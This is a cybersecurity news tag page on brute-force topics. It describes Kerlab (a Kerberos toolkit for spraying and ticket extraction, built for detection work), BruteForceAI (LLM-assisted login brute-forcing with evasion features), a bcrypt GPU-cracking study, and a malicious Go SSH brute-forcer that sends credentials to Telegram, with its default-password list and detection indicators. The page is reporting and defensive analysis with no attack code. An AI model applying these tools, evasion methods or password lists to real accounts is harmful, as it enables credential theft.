CybserSecurity News

Tag: brute-force

  • Inside the Protocol: Master Kerberos Defense and Detection with Kerlab’s Rust Toolkit

    Kerlab

    A Rust implementation of Kerberos for FUn and Detection

    Kerlab was developed just to drill down kerberos protocol and better understand it. The main purpose is to write more targeted detection rules.

    kerasktgt Kerberos Ask Ticket Granting Ticket

    Use to ask the first Ticket in kerberos protocol. If the username is not set, the TGT request is made without pre authentication. It will write the ticket into KRB_CRED format, compatible with rubeus or mimikatz. We can choose between the cleartext password, or the ntlm hash version.

    kerasktgs Kerberos Ask Ticket Granting Servive

    Use to ask a TGS ticket using a saved TGT. kerasktgs support S4U protocol extension, through s4u options.

    kerforce Kerberos Brute Force

    Use to perform an online brute force attack. The file attribute is just a file with a password at each line.

    kerspray Kerberos Password Spraying

    Use to perform a Kerberos Password spraying attack using a list of username.

    kerticket Kerberos Ticket Viewer

    Print informations of ticket saved on disk. Use to convert a ticket into hashcat compatible format. We can decrytp the EncTicketPartBody using the hash or the password of the service (including krbtgt).

    Download

  • Brute Force Reimagined: How BruteForceAI Uses LLMs to Crack Complex Login Forms

    BruteForceAI is an advanced penetration testing tool that revolutionizes traditional brute-force attacks by integrating Large Language Models (LLM) for intelligent form analysis. The tool automatically identifies login form selectors using AI, then executes sophisticated multi-threaded attacks with human-like behavior patterns.

    LLM-Powered Form Analysis

    • Stage 1 (AI Analysis): LLM analyzes HTML content to identify login form elements and selectors
    • Stage 2 (Smart Attack): Executes intelligent brute-force attacks using AI-discovered selectors

    Advanced Attack Features

    • Multi-threaded execution with synchronized delays
    • Bruteforce & Password Spray attack modes
    • Human-like timing with jitter and randomization
    • User-Agent rotation for better evasion
    • Webhook notifications (Discord, Slack, Teams, Telegram)
    • Comprehensive logging with SQLite database

    Features

    Intelligent Analysis

    • LLM-powered form selector identification (Ollama/Groq)
    • Automatic retry with feedback learning
    • DOM change detection for success validation
    • Smart HTML content extraction

    Advanced Attacks

    • Bruteforce Mode: Try all username/password combinations
    • Password Spray Mode: Test each password against all usernames
    • Multi-threaded execution (1-100+ threads)
    • Synchronized delays between attempts for same user

    Evasion Techniques

    • Random User-Agent rotation
    • Configurable delays with jitter
    • Human-like timing patterns
    • Proxy support
    • Browser visibility control

    Monitoring & Notifications

    • Real-time webhook notifications on success
    • Comprehensive SQLite logging
    • Verbose timestamped output
    • Success exit after first valid credentials
    • Skip existing attempts (duplicate prevention)

    Operational Features

    • Output capture to files
    • Colorful terminal interface
    • Network error retry mechanism
    • Force retry existing attempts
    • Database management tools
    • Automatic update checking from mordavid.com

    Install & Use

  • New GPUs Make Hacking Passwords Easier. Is Yours Still Safe?

    Researchers at Specops have updated their study on cracking passwords hashed with bcrypt. Two years earlier they published similar findings, but the hardware landscape has shifted dramatically since: the AI boom and surging compute demand have made high-end GPUs more affordable and accessible than ever.

    This shift transcends gaming. Modern GPUs are repurposed to train large language models, and idle cycles are routinely rented out on platforms such as vast.ai. The same hardware can be redeployed for other tasks — including attacks against hashed passwords.

    In the new experiment the team used a cluster of eight RTX 5090 cards — a configuration the researchers describe as the “practical minimum” for today’s adversaries. Renting comparable cloud capacity costs on the order of $5 per hour, rendering such attacks attainable even for small groups; larger rigs with 16 GPUs also appear on the market.

    Password cracking

    Unlike earlier measurements that relied on an antiquated bcrypt cost factor of 5, the Specops team tested with more realistic cost parameters of 10 and above. They generated 750,000 hashes derived from the real-world RockYou password corpus. Higher cost factors extend not only the cracking time but also the time required to produce the test corpus: building a dataset at cost 14 required nearly five hours on a powerful workstation.

    The results are telling: an RTX 5090 is roughly 65% faster than its predecessor when handling bcrypt, yet increased hashing costs partially offset that advantage. Short, trivial passwords such as “123456” or “admin” remain trivial to crack, but long, complex passphrases — particularly those exceeding 12 characters — are effectively immune to brute force.

    Timing data show a stark nonlinearity: very short passwords drawn from limited character sets fall almost instantly — four- or five-digit strings succumb immediately; six-character numeric or alphabetic passwords yield within minutes or hours. But an eight-character secret employing mixed case, digits, and symbols can push brute-force timelines to millennia. Once you reach 12 characters with the full complement of character classes, exhaustive search becomes infeasible within any practical horizon.

    It is important to note that real attacks seldom rely on pure brute force. Adversaries more often use dictionaries, mangling rules, or targeted wordlists assembled from corporate footprints. Yet brute force provides a baseline metric of an attacker’s compute capability and underscores the protective value of length and entropy.

    Specops stresses that hashing strength alone is not a panacea: if a password has already been exposed in a leak, bcrypt offers no salvation — the protection is nullified once the secret is compromised.

    Consequently, the researchers recommend holistic password policies: a minimum length of at least 18 characters, mandatory use of multiple character classes, and support for long passphrases. Organizations should also maintain bespoke blocklists that forbid terms tied to the company — product names, brands and other obvious words — which can be generated using tools like CeWL against the organization’s public assets.

    The study’s verdict is simple: cracking has become more attainable as hardware grows more potent, but robust defenses still work — provided users adopt long, unique, high-entropy passwords. In a world where GPUs can be rented for $5 an hour, entropy and length remain the cornerstones of password security.

  • Trust Betrayed: A Malicious Go Package Is a Brute-Force Tool and a Data Thief

    Experts at Socket have uncovered a malicious Go package named golang-random-ip-ssh-bruteforce, which masquerades as a tool for brute-forcing SSH credentials but in reality exfiltrates them to its author via Telegram. The module’s logic is straightforward: upon the first successful login, it immediately transmits the target’s IP address, username, and password to a hardcoded Telegram bot, then terminates execution, leaving the stolen data at the attacker’s disposal.

    The package operates in an infinite loop, generating random IPv4 addresses, checking for an open TCP port 22, and, if found, launching parallel authentication attempts from a built-in dictionary of usernames and passwords. Authentication checks are deliberately weakened — the code disables server verification with ssh.InsecureIgnoreHostKey, ensuring connections proceed without safeguards. On the first successful login, the captured ip:user:pass trio is sent directly to a private Telegram chat via the Telegram Bot API. Tests confirmed that the bot token and chat ID are active, with credentials delivered to an account under the alias @io_ping through the bot @sshZXC_bot.

    The embedded dictionary is limited but targeted — only two accounts, root and admin, paired with common default passwords such as root, toor, raspberry, dietpi, alpine, 123456, alongside variants like webadmin, webmaster, techsupport, and others. This selection is clearly aimed at IoT devices, single-board computers, and poorly secured Linux hosts left with factory defaults. The restricted dataset minimizes noise during brute-forcing and accelerates the discovery of weak targets, aligning with the program’s design to exit after the first successful compromise.

    The module’s author is a Russian developer active in the Go ecosystem and on GitHub under the alias IllDieAnyway. His profile features an arsenal of offensive tools: fast port scanners, a phpMyAdmin brute-forcer that also sends results to Telegram, the Selica-C2 management framework, and utilities for launching DDoS attacks. Many of these projects follow the same template — once a target is compromised, stolen data is exfiltrated via Telegram. His repositories are filled with Russian-language comments and documentation, including utilities linked to the social network VKontakte. Based on this evidence, analysts conclude that the developer operates within the Russian-speaking cybercriminal community.

    The danger of this package is twofold. On the one hand, installing it implicates the user in illegal activity — scanning networks and brute-forcing passwords — which can lead to ISP blocks or even criminal liability. On the other hand, the operator becomes a victim themselves: all “successful” compromises are siphoned off to the author, while their system resources are exploited to fuel someone else’s infrastructure. In effect, anyone running golang-random-ip-ssh-bruteforce is unknowingly working on behalf of a third-party attacker.

    Experts recommend strict software supply chain hygiene: auditing third-party tools before use, blocking network requests to the Telegram API and similar services, and restricting outbound connections from workstations where such utilities should never run. For detection, defenders should watch for red flags such as calls to ssh.InsecureIgnoreHostKey, the presence of a wl.txt default password dictionary, and hardcoded Telegram API requests.